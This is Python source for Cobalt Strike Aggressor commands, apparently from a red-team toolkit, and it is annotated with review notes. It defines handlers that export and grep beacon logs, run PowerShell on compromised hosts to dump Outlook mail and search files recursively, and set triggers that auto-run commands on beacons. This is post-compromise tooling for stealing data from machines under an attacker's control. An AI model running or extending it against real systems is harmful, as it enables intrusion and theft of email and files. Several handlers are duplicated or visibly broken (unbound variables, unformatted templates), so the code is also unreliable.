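def _(*args):
    """Aggressor command `logs`: append a user's or computer's beacon log entries to a file.

    Walks every `beaconlog` frame in the team server's data model, keeps the
    frames whose beacon matches `-u/--user` and/or `-c/--computer`, and
    appends the raw log text of each match to the `out` file.

    Args:
        *args: Raw command arguments, parsed with `helpers.ArgumentParser`.

    Side effects:
        Appends to `args.out` (opened per match, so no file is created when
        nothing matches). Reports the match count through `engine.message`,
        or an error through `engine.error` when neither filter is given.
    """
    parser = helpers.ArgumentParser(
        prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        # helpers.ArgumentParser reports usage problems itself; nothing to do here.
        return

    # With no filter the old comparison was against None, which matched
    # nothing (or every beacon whose info lookup returned None). Refuse instead.
    if args.user is None and args.computer is None:
        engine.error('Specify --user and/or --computer')
        return

    def matches(bid):
        """Return True when any *supplied* filter matches this beacon (OR semantics, as before)."""
        if args.user is not None and aggressor.beacon_info(bid, 'user') == args.user:
            return True
        if args.computer is not None and aggressor.beacon_info(bid, 'computer') == args.computer:
            return True
        return False

    finds = 0
    for frame in aggressor.data_query('beaconlog'):
        output_type, bid = frame[0], frame[1]
        # 'beacon_input' frames carry (type, bid, user, data, time); the
        # other frame types carry (type, bid, data, time). The timestamp was
        # previously converted here but never used, so it is not read.
        data = frame[3] if output_type == 'beacon_input' else frame[2]
        if not matches(bid):
            continue
        finds += 1
        # -o/--out: append mode, opened per match so an empty run leaves no file
        with open(args.out, 'a+') as fp:
            fp.write(data)

    engine.message('Wrote {} finds to {}'.format(finds, args.out))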
def _(bid, *args):
    """Beacon-console command `logs`: write this beacon's log entries to a file.

    Hands the work to `get_logs` (defined elsewhere in this file) and reports
    how many entries were written to the beacon console via `aggressor.blog2`.
    """
    parser = helpers.ArgumentParser(
        prog='logs', bid=bid, description='Get logs for a beacon')
    parser.add_argument('out', help='Output file')
    try:
        opts = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return
    entries = get_logs(opts.out, bid=bid)
    summary = 'Wrote {} log entries to: {}'.format(entries, opts.out)
    aggressor.blog2(bid, summary)
def _(bid, *args):
    """Beacon-console command `outlook`: query the local Outlook mailbox via PowerShell.

    Assembles a PowerShell pipeline from the options and runs it with
    `aggressor.bpowerpick`. `outlook()` (defined elsewhere in this file)
    presumably supplies the prologue that defines `$namespace` and `$folders`,
    which the fragments below reference.

    NOTE(review): the `-f/--folder` branch formats with the name `folder`, but
    the only assignment to it is commented out, so that branch raises
    NameError as written. Option values are spliced into the command verbatim
    (no escaping), so a subject or path containing a double quote breaks the
    generated command.
    """
    parser = helpers.ArgumentParser(bid=bid, prog='outlook')
    parser.add_argument('-f', '--folder', help='Folder name to grab')
    parser.add_argument('-s', '--subject', help='Match subject line (glob)')
    parser.add_argument('-t', '--top', metavar='N', type=int,
                        help='Only show top N results')
    parser.add_argument('-d', '--dump', action='store_true',
                        help='Get full dump')
    parser.add_argument('-o', '--out', help='Output file')
    try:
        args = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return

    command = ''
    command += outlook()

    # -f/--folder
    if args.folder:
        # specified folder
        #folder = args.folder.lstrip('\\')
        # NOTE(review): `folder` is unbound at this point (see docstring).
        command += helpers.code_string(r""" $folder = $namespace.Folders.Item("{}") """.format(folder))
    else:
        # inbox
        command += helpers.code_string(r""" $folder = $namespace.getDefaultFolder($folders::olFolderInBox) """)

    command += helpers.code_string(r""" $folder.items""")

    # -s/--subject: wildcard match on the subject line
    if args.subject:
        command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format(
            args.subject)

    # -t/--top: keep only the first N items
    if args.top:
        command += ' | select -First {}'.format(args.top)

    # -d/--dump: without it, only a summary of each item is selected
    if not args.dump:
        # print summary only
        #command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress'
        command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress'

    # -o/--out: redirect the pipeline output to a file
    if args.out:
        command += ' > {}'.format(args.out)

    aggressor.bpowerpick(bid, command)
def _(*args):
    """Aggressor command `logs`: write log entries for a user or computer to a file.

    Filtering and writing are delegated to `get_logs` (defined elsewhere in
    this file); this handler only parses options and reports the count.
    """
    parser = helpers.ArgumentParser(
        prog='logs', description='Get logs for a user or computer')
    parser.add_argument('-c', '--computer', help='Get logs for computer')
    parser.add_argument('-u', '--user', help='Get logs for user')
    parser.add_argument('out', help='Output file')
    try:
        opts = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return
    entries = get_logs(opts.out, user=opts.user, computer=opts.computer)
    summary = 'Wrote {} log entries to: {}'.format(entries, opts.out)
    engine.message(summary)
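def _(*args):
    """Aggressor command `grep-logs`: search every beacon log for one or more regexes.

    For each regex (matched case-insensitively), walks the `beaconlog` data
    model, splits each frame's text with `split_output` (defined elsewhere in
    this file) and reports or files every matching chunk.

    Args:
        *args: Raw command arguments, parsed with `helpers.ArgumentParser`.
            `-w/--whole` reports the entire frame instead of the matching
            chunk (once per frame, even if several chunks match);
            `-o/--out` appends matches to a file instead of printing them.

    Side effects:
        Appends to `args.out` when given, otherwise prints each hit with
        `engine.message`. Per-regex summaries go through `engine.message`;
        "nothing found" and malformed patterns go through `engine.error`.
    """
    parser = helpers.ArgumentParser(
        prog='grep-logs', description='Grep beacon logs for a regex')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-w', '--whole', action='store_true',
                        help='Show whole output')
    parser.add_argument('regex', action='append', help='Search for regex')
    try:
        args = parser.parse_args(args)
    except:
        # helpers.ArgumentParser reports usage problems itself; nothing to do here.
        return

    for regex in args.regex:
        # Compile once per pattern instead of once per log chunk, and turn a
        # malformed pattern into an error message rather than a traceback.
        try:
            pattern = re.compile(regex, re.IGNORECASE)
        except re.error as err:
            engine.error("Invalid regex '{}': {}".format(regex, err))
            continue

        finds = 0
        engine.message("Searching beacon logs for '{}'".format(regex))
        for frame in aggressor.data_query('beaconlog'):
            output_type, bid = frame[0], frame[1]
            # 'beacon_input' frames carry (type, bid, user, data, time);
            # the other frame types carry (type, bid, data, time).
            if output_type == 'beacon_input':
                data = frame[3]
                when = convert_time(frame[4])
            else:
                data = frame[2]
                when = convert_time(frame[3])

            chunks = [log for log in split_output(data) if pattern.search(log)]
            if not chunks:
                continue

            # -w/--whole: report the frame once rather than once per matching
            # chunk, which previously duplicated the same frame in the output.
            outputs = [data] if args.whole else chunks
            for output in outputs:
                finds += 1
                # -o/--out
                if args.out:
                    with open(args.out, 'a+') as fp:
                        fp.write(output)
                else:
                    # beacon identity is only needed for the console message
                    beacon = '{}@{}'.format(aggressor.beacon_info(bid, 'user'),
                                            aggressor.beacon_info(bid, 'computer'))
                    engine.message("Found beacon log matching '{}' from {} at {}:\n{}".format(regex, beacon, when, output))

        if not finds:
            engine.error("Didn't find any beacon logs containing '{}'".format(regex))
        elif args.out:
            engine.message("Wrote {} finds containing '{}' to '{}'".format(finds, regex, args.out))
        else:
            engine.message("Found {} logs containing '{}'".format(finds, regex))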
def _(bid, *args):
    """Beacon-console command `find`: recursively list files under a directory.

    Builds a `gci -Recurse` PowerShell pipeline from the options, passing
    operator-supplied values through `powershell_quote` (defined elsewhere in
    this file), and runs it with `aggressor.bpowerpick`.

    NOTE(review): the `-d/--days` branch appends its template without
    `.format(args.days)`, so the literal `{}` reaches PowerShell.
    `default='.'` on a positional without `nargs='?'` has no effect, so `dir`
    is required despite the help text. argparse %-formats help strings, so
    the bare `%` in the `--home` help is likely to raise when help is
    rendered (`%%` would be needed) — confirm against the helpers subclass.
    """
    parser = helpers.ArgumentParser(bid=bid, prog='find')
    parser.add_argument('-n', '--name', action='append', help='Name to match')
    parser.add_argument('-i', '--iname', action='append',
                        help='Name to match (case insensitive)')
    parser.add_argument('--not', dest='not_', action='store_true',
                        help='Invert --name and --iname')
    parser.add_argument('-d', '--days', type=int,
                        help='Select files no more than DAYS old')
    parser.add_argument('--dirs', action='store_true',
                        help='Include directories')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='Enable verbose')
    parser.add_argument('--home', action='store_true',
                        help='Search relative to %USERPROFILE% instead of .')
    parser.add_argument('dir', default='.',
                        help='Directory to search from (default: .)')
    try:
        args = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return

    # --home: anchor the search at the profile directory instead of the cwd
    if args.home:
        directory = r'$env:userprofile\{}'.format(powershell_quote(args.dir))
    else:
        directory = powershell_quote(args.dir)

    command = 'gci -Recurse -Path {} 2>$null'.format(directory)

    # --dirs: without it, containers are filtered out so only files are listed
    if not args.dirs:
        command += ' | where { ! $_.PSIsContainer }'

    name_matches = []

    # -n/--name: case-sensitive wildcard match on the file name
    if args.name:
        for name in args.name:
            name_matches.append('$_.Name -Clike {}'.format(
                powershell_quote(name)))

    # -i/--iname: case-insensitive wildcard match on the file name
    if args.iname:
        for iname in args.iname:
            name_matches.append('$_.Name -Like {}'.format(
                powershell_quote(iname)))

    if name_matches:
        # several name patterns are OR-ed together
        where_statement = ' -Or '.join(name_matches)

        # --not: invert the combined name filter
        if args.not_:
            where_statement = '-Not ({})'.format(where_statement)

        command += " | Where-Object { " + where_statement + " }"

    # -d/--days
    # NOTE(review): `{}` is never substituted with args.days here (see docstring).
    if args.days:
        command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'

    # -o/--out: redirect the listing to a file
    if args.out:
        command += ' > {}'.format(powershell_quote(args.out))

    command += "; echo 'Finished searching in {}'".format(directory)

    aggressor.btask(
        bid, 'Tasked beacon to search for files in {}'.format(directory))

    # -v/--verbose: output is suppressed unless verbose was requested
    aggressor.bpowerpick(bid, command, silent=not args.verbose)
def _(*args):
    """Event-log command `auto`: add, list or remove beacon triggers.

    A trigger is a dict kept in the module-level `_triggers` list; it records
    the command to run, which beacons it applies to (`bids`, `users`,
    `computers` or `all`) and its `type` ('output', 'timed' or 'initial').
    `bot` and `TriggerTimer` are defined elsewhere in this file.

    NOTE(review): as written, `-r/--remove` compares `trigger['type']` against
    the bare name `timed` (NameError; the stored value is the string
    'timed'), and `if args.remove:` treats index 0 as "not given". The
    `--timed` option is commented out, so `args.timed` raises AttributeError
    whenever `--output` is not set, which makes the 'initial' branch
    unreachable. `-i/--initial` is parsed but never read.
    """
    global _triggers

    parser = helpers.ArgumentParser(prog='auto', event_log=True)
    parser.add_argument('-b', '--bid', action='append', type=int,
                        help='Bid to trigger on')
    parser.add_argument('-u', '--user', action='append',
                        help='User to trigger on')
    parser.add_argument('-c', '--computer', action='append',
                        help='Computer to trigger on')
    parser.add_argument('-a', '--all', action='store_true',
                        help='Trigger on all beacons')
    parser.add_argument(
        '-i', '--initial', action='store_true',
        help='Trigger on initial beacon (default for --user and --computer)')
    parser.add_argument('-o', '--output', action='store_true',
                        help='Trigger on beacon output (default for --bid)')
    #parser.add_argument('-t', '--timed', metavar='SECONDS', type=int, help='Trigger every X seconds')
    parser.add_argument('-r', '--remove', type=int, help='Remove a trigger')
    parser.add_argument('-l', '--list', action='store_true',
                        help='List triggers')
    parser.add_argument('command', nargs='*', help='Command to run')
    try:
        args = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return

    # -r/--remove
    # NOTE(review): index 0 is falsy and skips this branch; a `is not None`
    # test would be needed to remove trigger 0.
    if args.remove:
        if args.remove < len(_triggers) and args.remove >= 0:
            trigger = _triggers[args.remove]
            # NOTE(review): `timed` is unbound here — the stored type is the
            # string 'timed' — so this comparison raises NameError.
            if trigger['type'] == timed:
                trigger['timer'].stop()
            del _triggers[args.remove]
            bot.say('Removed trigger {}'.format(args.remove))
        else:
            bot.error('Trigger {} does not exist'.format(args.remove))

    # -l/--list
    elif args.list:
        output = 'Triggers:\n'
        for num, trigger in enumerate(_triggers):
            output += '{}: {}\n'.format(num, str(trigger))
        bot.say(output)

    else:
        # adding a trigger requires a target selector and a command
        if not (args.bid or args.user or args.computer or args.all):
            bot.error('Specify --bid, --user, --computer, or --all')
            return
        if not args.command:
            bot.error('Specify command')
            return

        trigger = {}
        trigger['command'] = args.command
        if args.bid:
            trigger['bids'] = args.bid
        if args.user:
            trigger['users'] = args.user
        if args.computer:
            trigger['computers'] = args.computer
        if args.all:
            trigger['all'] = True

        # -o/--output
        if args.output:
            # on output
            trigger['type'] = 'output'
        # -t/--timed
        # NOTE(review): the option is commented out above, so `args.timed`
        # raises AttributeError when reached (see docstring).
        elif args.timed:
            # timed
            trigger['type'] = 'timed'
            trigger['time'] = args.timed
            trigger['timer'] = TriggerTimer(trigger)
            trigger['timer'].start()
        else:
            # on initial
            trigger['type'] = 'initial'

        _triggers.append(trigger)
        engine.debug('Adding trigger: {}'.format(str(trigger)))
        bot.good('Added trigger')
def _(bid, *args):
    """Beacon-console command `find`: recursively list files under a directory.

    Builds a `gci -Recurse` PowerShell pipeline from the options and runs it
    with `aggressor.bpowerpick`. Unlike the other `find` handler on this page,
    option values are spliced into the command inside plain double quotes
    rather than through a quoting helper, so a value containing `"` breaks
    the generated command.

    NOTE(review): the `-d/--days` branch appends its template without
    `.format(args.days)`, so the literal `{}` reaches PowerShell.
    `default='.'` on a positional without `nargs='?'` has no effect, so `dir`
    is required despite the help text.
    """
    parser = helpers.ArgumentParser(bid=bid, prog='find')
    parser.add_argument('-n', '--name', action='append', help='Name to match')
    parser.add_argument('-i', '--iname', action='append',
                        help='Name to match (case insensitive)')
    parser.add_argument('--not', dest='not_', action='store_true',
                        help='Invert --name and --iname')
    parser.add_argument('-d', '--days', type=int,
                        help='Select files no more than DAYS old')
    parser.add_argument('--dirs', action='store_true',
                        help='Include directories')
    parser.add_argument('-o', '--out', help='Output file')
    parser.add_argument('dir', default='.',
                        help='Directory to search from (default: .)')
    try:
        args = parser.parse_args(args)
    except:
        # usage errors are reported by helpers.ArgumentParser itself
        return

    command = 'gci -Recurse -Path "{}" 2>$null'.format(args.dir)

    # --dirs: without it, containers are filtered out so only files are listed
    if not args.dirs:
        command += ' | where { ! $_.PSIsContainer }'

    name_matches = []

    # -n/--name: case-sensitive wildcard match on the file name
    if args.name:
        for name in args.name:
            name_matches.append('$_.Name -Clike "{}"'.format(name))

    # -i/--iname: case-insensitive wildcard match on the file name
    if args.iname:
        for iname in args.iname:
            name_matches.append('$_.Name -Like "{}"'.format(iname))

    if name_matches:
        # several name patterns are OR-ed together
        where_statement = ' -Or '.join(name_matches)

        # --not: invert the combined name filter
        if args.not_:
            where_statement = '-Not ({})'.format(where_statement)

        command += " | Where-Object { " + where_statement + " }"

    # -d/--days
    # NOTE(review): `{}` is never substituted with args.days here (see docstring).
    if args.days:
        command += ' | ? { $_.LastWriteTime -Ge (Get-Date).AddDays(-{}) }'

    # -o/--out: redirect the listing to a file
    if args.out:
        command += ' > "{}"'.format(args.out)

    aggressor.bpowerpick(bid, command)